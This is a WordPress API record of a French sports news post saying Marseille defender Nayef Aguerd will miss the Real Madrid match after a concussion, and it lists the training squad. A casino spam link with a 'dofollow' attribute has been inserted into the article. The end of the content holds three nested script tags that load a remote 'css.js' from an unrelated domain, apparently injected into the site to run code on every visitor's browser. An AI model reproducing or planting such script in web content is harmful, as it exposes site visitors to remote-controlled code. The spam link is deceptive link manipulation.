{"id":3985,"date":"2025-11-20T03:54:37","date_gmt":"2025-11-20T03:54:37","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3985"},"modified":"2026-02-02T22:10:45","modified_gmt":"2026-02-02T22:10:45","slug":"real-om-protocole-commotion-active-lom-prive-daguerd","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/real-om-protocole-commotion-active-lom-prive-daguerd\/","title":{"rendered":"Real\/OM &#8211; Protocole commotion activ\u00e9, l\u2019OM priv\u00e9 d\u2019Aguerd !"},"content":{"rendered":"<h1>Real\/OM &#8211; Protocole commotion activ\u00e9, l\u2019OM priv\u00e9 d\u2019Aguerd !<\/h1>\n<h2>Aguerd forfait apr\u00e8s un choc face \u00e0 Lorient<\/h2>\n<p>Sorti touch\u00e9 lors du dernier match de championnat face \u00e0 Lorient, <strong>Nayef Aguerd<\/strong> a d\u00fb passer par le protocole commotion. Selon le journaliste,\u00a0<strong>Adrien Pittore<\/strong>, le d\u00e9fenseur central ne sera pas du d\u00e9placement \u00e0 Madrid pour le choc europ\u00e9en de cette semaine. Le joueur n\u2019a pas particip\u00e9 \u00e0 la s\u00e9ance collective ce lundi matin, confirmant son indisponibilit\u00e9.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-gratuit-fr.com\/casino-gratuit-app\/\" target=\"_blank\" rel=\"dofollow\">casino gratuit app<\/a><\/strong> &#8211; Vous cherchez une application de casino fiable, gratuite et riche en bonus ? Vous vous demandez comment t\u00e9l\u00e9charger l\u2019application Casino Gratuit, l\u2019installer<\/p><\/blockquote>\n<h2>Un coup dur avant le Real Madrid<\/h2>\n<p>Cette absence est un v\u00e9ritable coup dur pour le coach olympien. Aguerd s\u2019est impos\u00e9 comme un \u00e9l\u00e9ment cl\u00e9 de la d\u00e9fense marseillaise contre le FC Lorient. Son exp\u00e9rience et son impact dans les duels manqueront face \u00e0 l\u2019armada offensive madril\u00e8ne. Le staff technique devra recomposer sa charni\u00e8re centrale, avec des options comme Leonardo Balerdi ou d\u2019autres profils d\u00e9fensifs disponibles.<\/p>\n<h2>Le groupe \u00e0 l&#x27;entra\u00eenement avant Madrid<\/h2>\n<p>Lors de la derni\u00e8re s\u00e9ance avant le d\u00e9part, les gardiens <strong>Rulli<\/strong>, De Lange, Van Neck et Blanco \u00e9taient pr\u00e9sents. En d\u00e9fense, figuraient notamment Balerdi, Murillo, Pavard, Garc\u00eda, Lirola, Egan-Riley, Emerson, Medina et Weah. Le milieu de terrain comprenait des \u00e9l\u00e9ments comme Vermeeren, Kondogbia, Nadir, Hojbjerg, Angel Gomes, Bakola et O\u2019Riley. Enfin, l\u2019attaque reposera sur Paixao, Aubameyang, Greenwood, Gouiri, Vaz.<\/p>\n<h2>Une d\u00e9fense sous pression<\/h2>\n<p>Face \u00e0 un adversaire du calibre du Real Madrid, la solidit\u00e9 d\u00e9fensive de l\u2019OM sera scrut\u00e9e de pr\u00e8s. Priv\u00e9s de leur nouveau patron, les Olympiens devront afficher une rigueur collective pour contenir la puissance offensive espagnole. L\u2019absence d\u2019Aguerd obligera sans doute \u00e0 revoir certains automatismes, mais l\u2019\u00e9quipe peut s\u2019appuyer sur des joueurs exp\u00e9riment\u00e9s pour compenser ce manque.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Real\/OM &#8211; Protocole commotion activ\u00e9, l\u2019OM priv\u00e9 d\u2019Aguerd ! Aguerd forfait apr\u00e8s un choc face \u00e0 Lorient Sorti touch\u00e9 lors du dernier match de championnat face \u00e0 Lorient, Nayef Aguerd&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3985","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3985"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3985\/revisions"}],"predecessor-version":[{"id":14873,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3985\/revisions\/14873"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3985"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3985"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}